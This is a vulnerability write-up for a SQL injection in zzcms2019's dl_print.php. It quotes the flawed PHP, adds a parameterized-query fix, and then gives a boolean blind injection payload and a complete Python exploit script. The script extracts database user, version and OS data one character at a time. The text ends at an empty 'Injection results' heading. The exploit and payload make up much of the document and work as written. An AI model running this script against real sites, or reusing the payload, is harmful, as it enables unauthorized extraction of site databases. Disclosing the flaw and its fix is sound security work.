zzcms2019 SQL injection vulnerability in dl_print.php

For local testing, the user's user group must have permission to download agent (reseller) information; for convenience, grant it directly in the admin backend to simulate a real VIP user.

The vulnerability is at line 78 of /dl/dl_print.php, in the code that outputs the selected records. The key code is shown below:

```php
if(!empty($_POST['id'])){
    for($i=0; $i<count($_POST['id']);$i++){
        $id=$id.($_POST['id'][$i].',');
    }
}else{
    $founderr=1;
    $ErrMsg="<li>操作失败!请先选中要下载的信息</li>";
}
$id=substr($id,0,strlen($id)-1);// strip the trailing ","
```

. . .   . . .

```php
if (strpos($id,",")>0){
    $sql="select * from zzcms_dl where passed=1 and id in (". $id .") ";
}else{
    $sql="select * from zzcms_dl where passed=1  and id=".$id." order by id desc";
}
```

Because `$id` is concatenated into `id in (...)` without any quotes, the global GPC filter of ZZCMS (which only escapes quote characters) does not protect this numeric context, and Boolean conditions can be built directly for blind injection.
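As an added remediation example (not zzcms's own code), the same id handling rewritten so that every posted id is validated as a positive integer and bound as a query parameter; it assumes a PDO connection in `$pdo` and keeps the table and column names from the snippet above:

```php
<?php
// Added example, not zzcms code: hardened replacement for the id handling
// in dl_print.php. Assumes a PDO connection in $pdo (an assumption, zzcms may
// use a different database layer); table/column names follow the page.

/**
 * Return the posted ids as a de-duplicated list of positive integers, or null
 * when none are valid. Anything that is not a plain decimal integer is dropped,
 * so a value such as "0,(if(...))#" never reaches the SQL text.
 */
function validated_ids(array $post): ?array {
    if (empty($post['id']) || !is_array($post['id'])) {
        return null;
    }
    $ids = [];
    foreach ($post['id'] as $raw) {
        // ctype_digit rejects signs, spaces, commas, parentheses and quotes.
        if (is_string($raw) && ctype_digit($raw) && (int)$raw > 0) {
            $ids[] = (int)$raw;
        }
    }
    $ids = array_values(array_unique($ids));
    return $ids ?: null;
}

/**
 * Fetch the approved rows for the given ids with one bound placeholder per id.
 * The SQL text is fixed regardless of client input; the original "id in (...)"
 * and "id = ..." branches collapse into a single parameterized query.
 */
function fetch_dl_rows(PDO $pdo, array $ids): array {
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $sql = "SELECT * FROM zzcms_dl WHERE passed = 1 AND id IN ($placeholders) ORDER BY id DESC";
    $stmt = $pdo->prepare($sql);
    foreach ($ids as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT);   // positional params are 1-based
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Same control flow as the original: error message when nothing valid was selected.
$ids = validated_ids($_POST);
if ($ids === null) {
    $founderr = 1;
    $ErrMsg = "<li>操作失败!请先选中要下载的信息</li>";
} else {
    $rows = fetch_dl_rows($pdo, $ids);
}
```

The user-group permission check that gates access to dl_print.php is unchanged by this; the fix only closes the injection in the id handling.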

The first step is to register a company-type account on the front end and publish an agent (reseller) listing, which the later injection will use.

Secondly, the current user's user group must have permission to print agent information (for local testing, simply grant the permission in the admin backend to simulate a VIP user in a real deployment).

payload:

```
id[0]=0,(if(((ascii(substr((select @@version),1,1)))=53),1,0)))#
```

Exploit script (exp):

```python
#coding: utf-8
import requests
import string

url = 'http://{}/dl/dl_print.php'

# request headers; adjust to your actual environment
headers = {
    'Host': '{}',
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:68.0) Gecko/20100101 Firefox/68.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Content-Length': '23',
    'Connection': 'keep-alive',
    'Cookie': '{}',
    'Upgrade-Insecure-Requests': '1'
}

def Sqli(host, sql):
    global url
    url = url.format(host)
    sqli = "ascii(substr(({}),{},1)))={}"
    sqli_2 = "0,(if((({}),1,0)))#"
    res_data = ""
    s = requests.session()
    i = 1
    while True:
        tmp_data = res_data
        for c in string.printable:
            post_sqli_data = sqli_2.format(sqli.format(sql, str(i), ord(c)))
            data = {'id[0]': post_sqli_data}
            res = s.post(url, data=data, headers=headers)
            if '13333333333' in res.text:  # marker from the test data; adjust to your environment
                res_data += c
                print(res_data)
                break
        i += 1
        if tmp_data == res_data:
            print('完成')
            return

if __name__ == "__main__":
    # set the host address
    host = "127.0.0.1:9000"
    # set the user cookie
    user_cookie = "PHPSESSID=dh6bhd10g47tjc4jlhqf2leqnn; UserName=admin2; PassWord=343b1c4a3ea721b2d640fc8700db0f36"
    sql = "select group_concat(user(),version(),@@version_compile_os)"
    headers['Host'] = headers['Host'].format(host)
    headers['Cookie'] = headers['Cookie'].format(user_cookie)
    Sqli(host, sql)
```

Injection results